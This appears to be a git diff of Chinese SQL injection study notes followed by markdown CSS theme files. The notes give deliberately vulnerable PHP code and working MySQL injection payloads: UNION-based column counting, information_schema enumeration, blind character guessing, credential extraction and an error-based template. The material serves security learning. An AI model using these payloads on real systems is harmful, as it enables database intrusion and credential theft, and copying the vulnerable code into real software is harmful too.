#MYSQL注入笔记
-##判断注入类型
+##数据库信息
设数据库```security```里有如下```users```表。
```
+----------+-------------+------+-----+---------+----------------+
3 rows in set (0.00 sec)
```
+
+##构造注入SQL之一【GET - ErrorBased - IntegerBased】
+###1. 漏洞代码
+
大致PHP代码如下
```
-<?php
-if(isset($_GET['id'])) {
- $id=$_GET['id'];
- $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
- $result=mysql_query($sql);
- $row = mysql_fetch_array($result);
-
- if($row) {
- echo 'Your Login name:'. $row['username'];
- echo "<br>";
- echo 'Your Password:' .$row['password'];
- } else {
- print_r(mysql_error());
- }
+$id=$_GET['id'];
+$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
+$result=mysql_query($sql);
+$row = mysql_fetch_array($result);
+
+if($row) {
+ echo 'Your Login name:'. $row['username'];
+ echo "<br>";
+ echo 'Your Password:' .$row['password'];
} else {
- echo "Please input the ID as parameter with numeric value";
+ print_r(mysql_error());
}
-?>
```
+通过提交```?id=1 AND 1=1```和```?id=1 AND 1=2```来判断
-###1. 文本型
-```SELECT * FROM users WHERE id='$id' LIMIT 0,1;```
-
-提交```?id=1' AND '1'='1```和```?id=1' AND '1'='2```来判断。
-###2. 数字型
-```SELECT * FROM users WHERE id=$id LIMIT 0,1;```
-
-提交```?id=1 AND 1=1```和```?id=1 AND 1=2```来判断。
-##构造注入SQL
-
-###1. 猜解字段数
+###2. 猜解字段数
通过``` UNION ALL SELECT NULL```中的```NULL```来猜解表的字段数,例如对于```users```表采用```SELECT *```的话就需要把SQL构造成``` UNION ALL SELECT NULL, NULL, NULL#```,如果采用```SELECT username, password```就只需要``` UNION ALL SELECT NULL, NULL#```就能判断出了。因此如果程序中写的不是```SELECT *```的话,猜解出来的字段数与实际可能不太一样。
-###1. 获取MySQL信息
+###3. 获取MySQL信息
如果想要获取数据库的一些信息可以利用已经显示出来的字段,在构造注入代码的时候将这些信息替换到已经显示的字段里。
+------+----------------+----------+
| id | username | password |
+------+----------------+----------+
-| NULL | root@localhost | NULL |
+| NULL | sqli@localhost | NULL |
+------+----------------+----------+
1 row in set (0.00 sec)
```
* 如果不能直接通过网页得到数据库数量,可以通过```1 AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),CHAR(32)) FROM information_schema.SCHEMATA),1,1)) > ord('1') ```来猜解。
* 猜解表名```1 AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0,1),1,1)) > ord('a')``` 当猜解的字母的值只有```>=0```成功时,表示该表名猜解完成。(其中```LIMIT x,y```中```x```表示从第几条记录开始查询,```y```表示最多要查询多少条记录)。通过变动```MID```和```LIMIT```的参数就可以把所有表名猜解完。
* 猜解表的字段数 ```-1 UNION ALL SELECT NULL, (SELECT COUNT(*) FROM information_schema.COLUMNS where table_name='users' AND table_schema='security'), NULL``` 或 ```-1 UNION ALL SELECT NULL, IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)), NULL FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND table_schema=CHAR(115,101,99,117,114,105,116,121)```
-* 逐个猜解字段 ```-1 UNION ALL SELECT NULL, CONCAT(column_name, ' ', column_type), NULL FROM information_schema.COLUMNS where table_name='users' AND table_schema='security' LIMIT 0,1``` 或 ```-1 UNION ALL SELECT NULL, NULL, CONCAT(IFNULL(CAST(column_name AS CHAR),CHAR(32)), ' ', IFNULL(CAST(column_type AS CHAR),CHAR(32))) FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND table_schema=CHAR(115,101,99,117,114,105,116,121) LIMIT 0,1```
-* 猜解记录数```-1 UNION ALL SELECT NULL, NULL, IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) FROM security.users```
-* 逐个获取字段```-1 UNION ALL SELECT NULL, NULL, CONCAT(IFNULL(CAST(id AS CHAR),CHAR(32)), ' ',IFNULL(CAST(username AS CHAR),CHAR(32)), ' ', IFNULL(CAST(password AS CHAR),CHAR(32))) FROM security.users LIMIT 0,1```
+* 逐个猜解字段 ```-1 UNION ALL SELECT NULL, CONCAT(column_name, ' ', column_type), NULL FROM information_schema.COLUMNS where table_name='users' AND table_schema='security' LIMIT 0,1 ``` 或 ```-1 UNION ALL SELECT NULL, CONCAT(IFNULL(CAST(column_name AS CHAR),CHAR(32)), ' ', IFNULL(CAST(column_type AS CHAR),CHAR(32))), NULL FROM information_schema.COLUMNS WHERE table_name=CHAR(117,115,101,114,115) AND table_schema=CHAR(115,101,99,117,114,105,116,121) LIMIT 0,1```
+* 猜解记录数```-1 UNION ALL SELECT NULL, IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)), NULL FROM security.users```
+* 逐个获取字段```-1 UNION ALL SELECT NULL, CONCAT(IFNULL(CAST(id AS CHAR),CHAR(32)), ' ',IFNULL(CAST(username AS CHAR),CHAR(32)), ' ', IFNULL(CAST(password AS CHAR),CHAR(32))), NULL FROM security.users LIMIT 0,1```
+
+##构造注入SQL之二【GET - ErrorBased - SingleQuotes - String】
+###1.漏洞代码
+```
+$id=$_GET['id'];
+$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
+$result=mysql_query($sql);
+$row = mysql_fetch_array($result);
+
+if($row) {
+ echo 'Your Login name:'. $row['username'];
+ echo "<br>";
+ echo 'Your Password:' .$row['password'];
+} else {
+ print_r(mysql_error());
+}
+```
+
+###2.注入思路
+通过提交```?id=1' AND '1'='1```和```?id=1' AND '1'='2```来判断。
+其它与IntegerBased相似。如获取当前数据库的名字为```-1' UNION ALL SELECT NULL, DATABASE(), NULL AND '1'='```
+
+
+##构造SQL注入之三
+###1.漏洞代码
+```
+$id=$_GET['id'];
+$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
+$result=mysql_query($sql);
+$row = mysql_fetch_array($result);
+
+if($row) {
+ echo 'You are in...........';
+}
+else {
+ print_r(mysql_error());
+}
+```
+本代码的特点是不会在网页上输出任何字段值。
+###2.注入思路
+由于程序代码并不在网页上显示任何字段,因此我们如果想要得到数据库的一些信息得另外想办法。有一个方法是利用程序执行SQL时产生的错误会显示到网页上这一点,将要显示的信息嵌入错误信息里。对于MySQL利用的模板代码为```select count(*), CONCAT(CURRENT_USER(), FLOOR(RAND(0)*2)) x from information_schema.tables group by x;```会得到类似```ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 'group_key'```的错误提示。
+
code, tt {
margin: 0 2px;
padding: 0 5px;
- white-space: nowrap;
+ white-space: wrap;
border: 1px solid #eaeaea;
background-color: #f8f8f8;
border-radius: 3px; }
white-space: pre;
border: none;
background: transparent; }
+code {
+ font-size:9px; }
.highlight pre {
background-color: #f8f8f8;
--- /dev/null
+body {
+ font-family: Helvetica, arial, sans-serif;
+ font-size: 14px;
+ line-height: 1.6;
+ padding-top: 10px;
+ padding-bottom: 10px;
+ background-color: white;
+ padding: 30px; }
+
+body > *:first-child {
+ margin-top: 0 !important; }
+body > *:last-child {
+ margin-bottom: 0 !important; }
+
+a {
+ color: #4183C4; }
+a.absent {
+ color: #cc0000; }
+a.anchor {
+ display: block;
+ padding-left: 30px;
+ margin-left: -30px;
+ cursor: pointer;
+ position: absolute;
+ top: 0;
+ left: 0;
+ bottom: 0; }
+
+h1, h2, h3, h4, h5, h6 {
+ margin: 20px 0 10px;
+ padding: 0;
+ font-weight: bold;
+ -webkit-font-smoothing: antialiased;
+ cursor: text;
+ position: relative; }
+
+h1 {
+ text-align: center;}
+
+h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor {
+ background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAA09pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNiAoMTMuMCAyMDEyMDMwNS5tLjQxNSAyMDEyLzAzLzA1OjIxOjAwOjAwKSAgKE1hY2ludG9zaCkiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OUM2NjlDQjI4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OUM2NjlDQjM4ODBGMTFFMTg1ODlEODNERDJBRjUwQTQiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo5QzY2OUNCMDg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo5QzY2OUNCMTg4MEYxMUUxODU4OUQ4M0REMkFGNTBBNCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PsQhXeAAAABfSURBVHjaYvz//z8DJYCRUgMYQAbAMBQIAvEqkBQWXI6sHqwHiwG70TTBxGaiWwjCTGgOUgJiF1J8wMRAIUA34B4Q76HUBelAfJYSA0CuMIEaRP8wGIkGMA54bgQIMACAmkXJi0hKJQAAAABJRU5ErkJggg==) no-repeat 10px center;
+ text-decoration: none; }
+
+h1 tt, h1 code {
+ text-align:center;
+ font-size: inherit; }
+
+h2 tt, h2 code {
+ font-size: inherit; }
+
+h3 tt, h3 code {
+ font-size: inherit; }
+
+h4 tt, h4 code {
+ font-size: inherit; }
+
+h5 tt, h5 code {
+ font-size: inherit; }
+
+h6 tt, h6 code {
+ font-size: inherit; }
+
+h1 {
+ font-size: 28px;
+ color: black; }
+
+h2 {
+ font-size: 24px;
+ border-bottom: 1px solid #cccccc;
+ color: black; }
+
+h3 {
+ font-size: 18px; }
+
+h4 {
+ font-size: 16px; }
+
+h5 {
+ font-size: 14px; }
+
+h6 {
+ color: #777777;
+ font-size: 14px; }
+
+p, blockquote, ul, ol, dl, li, table, pre {
+ margin: 15px 0; }
+
+p {
+ text-indent: 2em;
+}
+
+hr {
+ background: transparent url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAECAYAAACtBE5DAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyJpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBNYWNpbnRvc2giIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6OENDRjNBN0E2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6OENDRjNBN0I2NTZBMTFFMEI3QjRBODM4NzJDMjlGNDgiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo4Q0NGM0E3ODY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo4Q0NGM0E3OTY1NkExMUUwQjdCNEE4Mzg3MkMyOUY0OCIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PqqezsUAAAAfSURBVHjaYmRABcYwBiM2QSA4y4hNEKYDQxAEAAIMAHNGAzhkPOlYAAAAAElFTkSuQmCC) repeat-x 0 0;
+ border: 0 none;
+ color: #cccccc;
+ height: 4px;
+ padding: 0;
+}
+
+body > h2:first-child {
+ margin-top: 0;
+ padding-top: 0; }
+body > h1:first-child {
+ margin-top: 0;
+ padding-top: 0; }
+ body > h1:first-child + h2 {
+ margin-top: 0;
+ padding-top: 0; }
+body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child {
+ margin-top: 0;
+ padding-top: 0; }
+
+a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
+ margin-top: 0;
+ padding-top: 0; }
+
+h1 p, h2 p, h3 p, h4 p, h5 p, h6 p {
+ margin-top: 0; }
+
+li p.first {
+ display: inline-block; }
+li {
+ margin: 0; }
+ul, ol {
+ padding-left: 30px; }
+
+ul :first-child, ol :first-child {
+ margin-top: 0; }
+
+dl {
+ padding: 0; }
+ dl dt {
+ font-size: 14px;
+ font-weight: bold;
+ font-style: italic;
+ padding: 0;
+ margin: 15px 0 5px; }
+ dl dt:first-child {
+ padding: 0; }
+ dl dt > :first-child {
+ margin-top: 0; }
+ dl dt > :last-child {
+ margin-bottom: 0; }
+ dl dd {
+ margin: 0 0 15px;
+ padding: 0 15px; }
+ dl dd > :first-child {
+ margin-top: 0; }
+ dl dd > :last-child {
+ margin-bottom: 0; }
+
+blockquote {
+ border-left: 4px solid #dddddd;
+ padding: 0 15px;
+ color: #777777; }
+ blockquote > :first-child {
+ margin-top: 0; }
+ blockquote > :last-child {
+ margin-bottom: 0; }
+
+table {
+ padding: 0;border-collapse: collapse; }
+ table tr {
+ border-top: 1px solid #cccccc;
+ background-color: white;
+ margin: 0;
+ padding: 0; }
+ table tr:nth-child(2n) {
+ background-color: #f8f8f8; }
+ table tr th {
+ font-weight: bold;
+ border: 1px solid #cccccc;
+ margin: 0;
+ padding: 6px 13px; }
+ table tr td {
+ border: 1px solid #cccccc;
+ margin: 0;
+ padding: 6px 13px; }
+ table tr th :first-child, table tr td :first-child {
+ margin-top: 0; }
+ table tr th :last-child, table tr td :last-child {
+ margin-bottom: 0; }
+
+img {
+ max-width: 100%; }
+
+span.frame {
+ display: block;
+ overflow: hidden; }
+ span.frame > span {
+ border: 1px solid #dddddd;
+ display: block;
+ float: left;
+ overflow: hidden;
+ margin: 13px 0 0;
+ padding: 7px;
+ width: auto; }
+ span.frame span img {
+ display: block;
+ float: left; }
+ span.frame span span {
+ clear: both;
+ color: #333333;
+ display: block;
+ padding: 5px 0 0; }
+span.align-center {
+ display: block;
+ overflow: hidden;
+ clear: both; }
+ span.align-center > span {
+ display: block;
+ overflow: hidden;
+ margin: 13px auto 0;
+ text-align: center; }
+ span.align-center span img {
+ margin: 0 auto;
+ text-align: center; }
+span.align-right {
+ display: block;
+ overflow: hidden;
+ clear: both; }
+ span.align-right > span {
+ display: block;
+ overflow: hidden;
+ margin: 13px 0 0;
+ text-align: right; }
+ span.align-right span img {
+ margin: 0;
+ text-align: right; }
+span.float-left {
+ display: block;
+ margin-right: 13px;
+ overflow: hidden;
+ float: left; }
+ span.float-left span {
+ margin: 13px 0 0; }
+span.float-right {
+ display: block;
+ margin-left: 13px;
+ overflow: hidden;
+ float: right; }
+ span.float-right > span {
+ display: block;
+ overflow: hidden;
+ margin: 13px auto 0;
+ text-align: right; }
+
+code, tt {
+ margin: 0 2px;
+ padding: 0 5px;
+ white-space: wrap;
+ border: 1px solid #eaeaea;
+ background-color: #f8f8f8;
+ border-radius: 3px; }
+
+pre code {
+ margin: 0;
+ padding: 0;
+ white-space: pre;
+ border: none;
+ background: transparent; }
+code {
+ font-size:9px; }
+
+.highlight pre {
+ background-color: #f8f8f8;
+ border: 1px solid #cccccc;
+ font-size: 13px;
+ line-height: 19px;
+ overflow: auto;
+ padding: 6px 10px;
+ border-radius: 3px; }
+
+pre {
+ background-color: #f8f8f8;
+ border: 1px solid #cccccc;
+ font-size: 13px;
+ line-height: 19px;
+ overflow: auto;
+ padding: 6px 10px;
+ border-radius: 3px; }
+ pre code, pre tt {
+ background-color: transparent;
+ border: none; }
+
+sup {
+ font-size: 0.83em;
+ vertical-align: super;
+ line-height: 0;
+}
+* {
+ -webkit-print-color-adjust: exact;
+}
+@media screen and (min-width: 914px) {
+ body {
+ width: 854px;
+ margin:0 auto;
+ }
+}
+@media print {
+ table, pre {
+ page-break-inside: avoid;
+ }
+ pre {
+ word-wrap: break-word;
+ }
+}
--- /dev/null
+html {
+ font-size: 16px;
+}
+html,
+body {
+ -webkit-text-size-adjust: 100%;
+ -ms-text-size-adjust: 100%;
+ background: #363B40;
+}
+html,
+body,
+button,
+input,
+select,
+textarea,
+div.code-tooltip-content {
+ color: #b8bfc6;
+}
+div.code-tooltip,
+.md-hover-tip .md-arrow:after {
+ background: #4B535A;
+}
+.popover.bottom > .arrow:after {
+ border-bottom-color: #4B535A;
+}
+html,
+body,
+button,
+input,
+select,
+textarea {
+ font-style: normal;
+ line-height: 1.625rem;
+ font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
+ -webkit-font-smoothing: antialiased;
+}
+hr {
+ height: 2px;
+ border: 0;
+ margin: 50px 0 !important;
+}
+h1,
+h2,
+h3,
+h4,
+h5,
+h6 {
+ font-family: "Lucida Grande", "Corbal", Georgia, serif;
+ font-weight: normal;
+ clear: both;
+ -ms-word-wrap: break-word;
+ word-wrap: break-word;
+ margin: 0;
+ padding: 0;
+}
+h1 {
+ font-size: 2.25rem;
+ /* 36px */
+ line-height: 2.5rem;
+ /* 40px */
+ margin-bottom: 1.5rem;
+ /* 24px */
+ letter-spacing: -1.5px;
+ text-align: center;
+}
+h2 {
+ font-size: 1.5rem;
+ /* 24px */
+ line-height: 1.875rem;
+ /* 30px */
+ margin-bottom: 1.5rem;
+ /* 24px */
+ letter-spacing: -1px;
+}
+h3 {
+ font-size: 1.125rem;
+ /* 18px */
+ line-height: 1.5rem;
+ /* 24px */
+ margin-bottom: 1.5rem;
+ /* 24px */
+ letter-spacing: -1px;
+}
+h4 {
+ font-size: 1rem;
+ /* 16px */
+ line-height: 1.375rem;
+ /* 22px */
+ margin-bottom: 1.5rem;
+ /* 24px */
+}
+h5 {
+ font-size: 1rem;
+ /* 16px */
+ line-height: 1.25rem;
+ /* 22px */
+ margin-bottom: 1.5rem;
+ /* 24px */
+}
+h6 {
+ font-size: 1rem;
+ /* 16px */
+ line-height: 1rem;
+ /* 16px */
+ margin-bottom: 0.75rem;
+ /* 12px */
+ padding-bottom: 8px;
+ font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
+ display: inline-block;
+ font-weight: bold;
+}
+a {
+ text-decoration: none;
+ outline: 0;
+}
+a:hover {
+ outline: 0;
+}
+a:focus {
+ outline: thin dotted;
+}
+p {
+ -ms-word-wrap: break-word;
+ word-wrap: break-word;
+ text-indent: 2em;
+}
+p,
+ul,
+dd,
+ol,
+hr,
+address,
+pre,
+table,
+iframe,
+.wp-caption,
+.wp-audio-shortcode,
+.wp-video-shortcode {
+ margin-top: 0;
+ margin-bottom: 1.5rem;
+ /* 24px */
+}
+audio:not([controls]) {
+ display: none;
+}
+[hidden] {
+ display: none;
+}
+::-moz-selection {
+ background: #4a89dc;
+ color: #fff;
+ text-shadow: none;
+}
+::selection {
+ background: #4a89dc;
+ color: #fff;
+ text-shadow: none;
+}
+ul,
+ol {
+ padding: 0 0 0 1.875rem;
+ /* 30px */
+}
+ul {
+ list-style: square;
+}
+ol {
+ list-style: decimal;
+}
+ul ul,
+ol ol,
+ul ol,
+ol ul {
+ margin: 0;
+}
+b,
+th,
+dt,
+strong {
+ font-weight: bold;
+}
+i,
+em,
+dfn,
+cite {
+ font-style: italic;
+}
+blockquote {
+ padding-left: 1.875rem;
+ margin: 0 0 1.875rem 1.875rem;
+ border-left: solid 2px #474d54;
+ padding-left: 30px;
+ margin-top: 35px;
+}
+pre,
+code,
+kbd,
+tt,
+var {
+ background: rgba(0, 0, 0, 0.05);
+ font-size: 0.875rem;
+ font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace;
+}
+pre.md-fences {
+ padding: 10px 30px;
+ margin-bottom: 20px;
+}
+code,
+kbd,
+tt,
+var {
+ padding: 2px 0px;
+}
+code {
+ font-size:9px;
+}
+table {
+ max-width: 100%;
+ width: 100%;
+ border-collapse: collapse;
+ border-spacing: 0;
+}
+th,
+td {
+ padding: 5px 10px;
+ vertical-align: top;
+}
+a {
+ -webkit-transition: all .2s ease-in-out;
+ transition: all .2s ease-in-out;
+}
+hr {
+ background: #474d54;
+ /* variable */
+}
+#write>*:first-child {
+ margin-top: 40px;
+}
+h1 {
+ margin-top: 2em;
+}
+h1,
+h2,
+h3,
+h4,
+h5,
+h6 {
+ color: #DEDEDE
+}
+h6 {
+ border-bottom: solid 2px #474d54;
+}
+a {
+ color: #e0e0e0;
+ text-decoration: underline;
+}
+a:hover {
+ color: #fff;
+}
+b,
+th,
+dt,
+strong {
+ color: #DEDEDE;
+ /* variable */
+}
+blockquote {
+ color: #9DA2A6;
+}
+table a {
+ color: #DEDEDE;
+ /* variable */
+}
+th,
+td {
+ border: solid 1px #474d54;
+ /* variable */
+}
+
+.task-list{
+ padding-left: 0;
+}
+
+.task-list-item{
+ padding-left: 1.25rem;
+}
+
+.task-list-item input{
+ top: 0.1875rem;
+}
+
+.task-list-item input:before {
+ content: "";
+ display: inline-block;
+ width: 0.875rem;
+ height: 0.875rem;
+ vertical-align: middle;
+ text-align: center;
+ border: 1px solid #b8bfc6;
+ background-color: #363B40;
+ margin-top: -0.4375rem;
+}
+.task-list-item input:checked:before,
+.task-list-item input[checked]:before{
+ content: '\221A';
+ /*◘*/
+ font-size: 0.625rem;
+ line-height: 0.625rem;
+ color: #DEDEDE;
+}
+
+.cm-s-default .cm-variable,
+.cm-s-default .cm-operator,
+.cm-s-default .cm-property {
+ color: #b8bfc6;
+}
+.cm-s-default .cm-keyword {
+ color: #C88FD0;
+}
+.cm-s-default .cm-tag {
+ color: #7DF46A;
+}
+.cm-s-default .cm-attribute {
+ color: #7575E4;
+}
+.CodeMirror div.CodeMirror-cursor {
+ border-left: 1px solid #b8bfc6;
+ z-index: 3;
+}
+.cm-s-default .cm-string {
+ color: #D26B6B;
+}
+.cm-s-default .cm-comment {
+ color: #DA924A;
+}
+.cm-s-default .cm-header,
+.cm-s-default .cm-def {
+ color: #8d8df0;
+}
+.cm-s-default .cm-quote {
+ color: #57ac57;
+}
+.cm-s-default .cm-hr {
+ color: #d8d5d5;
+}
+.cm-s-default .cm-link {
+ color: #d3d3ef;
+}
+.cm-negative {
+ color: #d95050;
+}
+.cm-positive {
+ color: #50e650;
+}
+.cm-s-default .cm-string-2 {
+ color: #f50;
+}
+.cm-s-default .cm-meta,
+.cm-s-default .cm-qualifier {
+ color: #b7b3b3;
+}
+.cm-s-default .cm-builtin {
+ color: #694ea7;
+}
+.cm-s-default .cm-bracket {
+ color: #997;
+}
+.cm-s-default .cm-atom {
+ color: #84B6CB;
+}
+.cm-s-default .cm-number {
+ color: #64AB8F;
+}
+.cm-s-default .cm-variable {
+ color: #b8bfc6;
+}
+.cm-s-default .cm-variable-2 {
+ color: #9FBAD5;
+}
+.cm-s-default .cm-variable-3 {
+ color: #1cc685;
+}
+.CodeMirror-selectedtext {
+ background: #4a89dc;
+ color: #fff !important;
+ text-shadow: none;
+}
+#write pre.md-meta-block {
+ border-bottom: 1px dashed #ccc;
+ background: transparent;
+ padding-bottom: 0.6em;
+ line-height: 1.2em;
+}
+.btn,
+.btn .btn-default {
+ background: transparent;
+ color: #b8bfc6;
+}
+.md-table-edit {
+ border-top: 1px solid gray;
+}
+.popover-title {
+ background: transparent;
+}
+.md-image>.md-meta {
+ color: #BBBBBB;
+}
+.md-expand.md-image>.md-meta {
+ background:transparent;
+ color: #DDD;
+}
+#write>h3:before,
+#write>h4:before,
+#write>h5:before,
+#write>h6:before {
+ border: none;
+ border-radius: 0px;
+ color: #888;
+ text-decoration: underline;
+ left: -1.875rem;
+}
+#write>h3.md-focus:before{
+ top: 2px;
+}
+#write>h4.md-focus:before{
+ top: 2px;
+}
+
+.md-toc-item {
+ color: #A8C2DC;
+}
+
+#write div.md-toc-tooltip {
+ background-color: #363B40;
+}
+
+#outline-dropmenu .btn:hover, #outline-dropmenu .btn:focus,
+.md-toc .btn:hover, .md-toc .btn:focus{
+ color:white;
+}
+
+#outline-dropmenu {
+ background: rgba(50, 54, 59, 0.93);
+ border: 1px solid rgba(253, 253, 253, 0.15);
+}
+
+#outline-dropmenu .divider{
+ background-color: #b8bfc6;
+}
+
+.outline-expander:before {
+ top:2px;
+}
+
+.pin-outline #outline-dropmenu {
+ background: inherit;
+ box-shadow: none;
+ border-right: 1px dashed;
+}
+
+.pin-outline #outline-dropmenu:hover .outline-title-wrapper {
+ border-left:1px dashed;
+}
+
+.outline-title-wrapper .btn {
+ color:inherit;
+}
+
+.outline-item:hover {
+ border-color:#363B40;
+ background-color:#363B40;
+ color:white;
+}
+h1.md-focus .md-attr, h2.md-focus .md-attr, h3.md-focus .md-attr, h4.md-focus .md-attr, h5.md-focus .md-attr, h6.md-focus .md-attr, .md-hr .md-attr {
+ color: #8C8E92;
+ display: inline;
+}
+
+.md-inline-math g,
+.md-inline-math svg {
+ stroke: #b8bfc6 !important;
+ fill: #b8bfc6 !important;
+}
+
+[md-inline='inline_math'] {
+ color: #9CB2E9;
+}
+
+#math-inline-preview .md-arrow:after {
+ background: black;
+}
+
+.modal-content {
+ background-color: #393739;
+}
+
+.modal-footer {
+ border-top: 1px solid rgba(42, 6, 6, 0.36);
+}
+
+.modal-header {
+ border-bottom: 1px solid rgba(42, 6, 6, 0.36);
+}
+
+.modal-content input {
+ background-color: rgba(26, 21, 21, 0.51);
+ color: white;
+}
+
+.modal-content .input-group-addon{
+ background-color: rgba(0, 0, 0, 0.17);
+ color: white;
+}
+
+.modal-backdrop {
+ background-color: rgba(174, 174, 174, 0.7);
+}
+
+.modal-content .btn-primary {
+ border-color: #6dc1e7;
+}
+
+.md-table-resize-popover {
+ background-color: #4B535A;
+}